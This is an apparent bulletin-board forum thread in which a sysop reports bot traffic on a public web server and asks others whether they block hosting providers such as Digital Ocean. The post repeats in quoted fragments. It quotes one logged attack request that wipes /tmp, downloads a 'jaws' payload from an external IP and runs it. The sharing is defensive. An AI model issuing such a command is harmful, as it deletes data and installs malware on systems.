Not wanting to block those countries out entirely I decided to dig a littl deeper and noticed that many of these addresses had one thing in common: They're coming from Digital Ocean.
Most of these seem to be trying to log into wordpress or bring up other lo pages for other services that don't exist on this web server. Others seem be a little more insidious:
"GET /shell?cd+/tmp;rm+-rf+*;wget+31.210.xx.xxx/jaws;sh+/tmp/jaws HTTP/1.1
None of these work or do anything on my webserver, but I still don't want hammering on my system.
Fortunately Digital Ocean publishes a full list of the IP addresses they u https://digitalocean.com/geo/google.csv
After adding these ranges to my blocklist suddenly my apache logs are a lo quieter.
Do you filter by country/region or by provider? If so, which IP ranges do you block?
Hi All,
I have a web server accessible to the public, which as expected was getting hammered with various bots & script kiddies.
I've setup an IP blocklist for the usual suspects, but I was noticing a lot of malicious traffic from California, Germany, The Netherlands & the UK as well.
Not wanting to block those countries out entirely I decided to dig a little deeper and noticed that many of these addresses had one thing in common: They're coming from Digital Ocean.
Most of these seem to be trying to log into wordpress or bring up other login pages for other services that don't exist on this web server. Others seem to be a little more insidious:
"GET /shell?cd+/tmp;rm+-rf+*;wget+31.210.xx.xxx/jaws;sh+/tmp/jaws HTTP/1.1"
None of these work or do anything on my webserver, but I still don't
want them hammering on my system.
Fortunately Digital Ocean publishes a full list of the IP addresses they use: https://digitalocean.com/geo/google.csv
After adding these ranges to my blocklist suddenly my apache logs are a lot quieter.
Do you filter by country/region or by provider? If so, which IP ranges
do you block?
p.s: I know some BBS hubs are located on VPS providers, you may need to modify these lists if you want to use them so you can still communicate with your hub if they happen to use Digital Ocean. ML looks like he
uses OVH so he's safe... ;)
I have a web server accessible to the public, which as expected was getting hammered with various bots & script kiddies.
I've setup an IP blocklist for the usual suspects, but I was noticing a lot of malicious traffic from California, Germany, The
Netherlands & the UK as well.
Not wanting to block those countries out entirely I decided to dig a little deeper and noticed that many of these addresses had one
thing in common: They're coming from Digital Ocean.
Do you filter by country/region or by provider? If so, which IP
ranges do you block?
Sysop: | Shaun Ewing |
---|---|
Location: | Blue Mountains, Australia |
Users: | 197 |
Nodes: | 16 (0 / 16) |
Uptime: | 225:07:12 |
Calls: | 156 |
Files: | 187,819 |
Messages: | 331,247 |